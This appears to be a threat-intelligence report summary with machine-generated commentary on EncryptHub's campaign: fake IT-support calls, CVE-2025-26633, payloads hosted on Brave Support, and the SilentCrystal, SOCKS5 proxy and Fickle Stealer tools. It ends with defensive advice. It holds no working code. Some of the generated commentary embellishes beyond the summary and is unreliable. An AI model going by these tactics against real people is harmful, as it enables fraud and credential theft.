When Hackers Call: Social Engineering, Abusing Brave Support, and EncryptHub's Expanding Arsenal

SUMMARY :

EncryptHub, an emerging threat group, has launched a campaign combining social engineering with exploitation of CVE-2025-26633 to deliver malicious payloads. The attackers impersonate IT support staff, use remote desktop sessions, and execute PowerShell commands to deploy malware. The campaign abuses the Brave Support platform to host payloads and employs new tools like SilentCrystal and a SOCKS5 proxy backdoor. EncryptHub also created a fake video call platform, RivaTalk, to distribute malware. The group's tactics include using AES-encrypted commands, generating fake browser traffic, and exploiting system vulnerabilities. This adaptive adversary highlights the need for layered defense strategies, ongoing threat intelligence, and user awareness training to mitigate risks.

OPENCTI LABELS :

powershell,social engineering,golang,fickle stealer,cve-2025-26633,socks5 proxy,silentcrystal,rivatalk,brave support


AI COMMENTARY :

1. When Hackers Call: An Emerging Threat Landscape EncryptHub has rapidly emerged as a sophisticated adversary that blends traditional social engineering with technical exploits to infiltrate targets. Their latest campaign begins with a seemingly innocuous phone call or email that mimics legitimate IT support outreach. By posing as Brave Support representatives, they build trust with unsuspecting victims before pivoting to a more technical angle. This fusion of human manipulation and digital exploitation underscores the evolving threat landscape and the importance of proactive threat intelligence.

2. The Social Engineering Playbook EncryptHub’s operators excel at psychological manipulation, leveraging scripts that mimic common IT helpdesk protocols. Victims are guided through fake troubleshooting steps in remote desktop sessions, where attackers introduce malicious PowerShell commands disguised as routine maintenance. The group’s use of RivaTalk, a custom video call platform designed in GoLang, further cements their credibility by simulating authentic video support interactions. This level of deception illustrates how social engineering remains a cornerstone of modern cyberattacks.

3. Exploiting CVE-2025-26633 and Hosting on Brave Support Once trust is established, EncryptHub exploits CVE-2025-26633 to execute arbitrary code on vulnerable systems. Malicious payloads are hosted on compromised Brave Support infrastructure, allowing the group to bypass many security filters. The initial download often occurs under the guise of a routine software update, making detection difficult without robust intrusion detection systems. Victims who follow the attackers’ guidance unwittingly introduce a remote access Trojan that grants full system control to the threat actors.

4. The Malware Arsenal: SilentCrystal, SOCKS5 Proxy, and Fickle Stealer EncryptHub’s toolkit has expanded to include a custom backdoor called SilentCrystal, which leverages AES-encrypted commands for secure communications. Once deployed, SilentCrystal establishes a SOCKS5 proxy that tunnels traffic through infected hosts to conceal the attackers’ true location. In parallel, the group deploys Fickle Stealer—a Golang-based credential harvester that exfiltrates browser data, saved passwords, and cryptocurrency wallets. This dual-pronged approach maximizes data theft while maintaining persistent access.

5. Evasion Techniques and Operational Security To evade detection, EncryptHub injects fake browser traffic and spoofs user agent strings to mimic normal browsing patterns. Their PowerShell scripts are obfuscated and executed in memory, leaving minimal forensic artifacts on disk. Communication channels are protected with AES encryption, preventing security tools from inspecting commands and payloads. The adversary’s commitment to operational security highlights the ongoing arms race between defenders and sophisticated threat actors.

6. Mitigation and Defense Strategies Defending against EncryptHub’s multi-layered campaign requires a comprehensive approach. Organizations should deploy endpoint detection solutions capable of identifying unusual PowerShell activity and proxy tunneling. Regular patching to close CVE-2025-26633 and other vulnerabilities is critical, as is network segmentation to isolate support platforms like Brave Support. User awareness training focused on recognizing social engineering attempts and verifying support requests can thwart initial contact. Finally, continuous threat intelligence feeds will ensure defenders stay ahead of emerging tools like SilentCrystal and Fickle Stealer, transforming insights into actionable defenses.


OPEN NETMANAGEIT OPENCTI REPORT LINK!


Use public read only username and password on login page.

NOTE : Use Public READ only user credentials on login page banner.


When Hackers Call: Social Engineering, Abusing Brave Support, and EncryptHub's Expanding Arsenal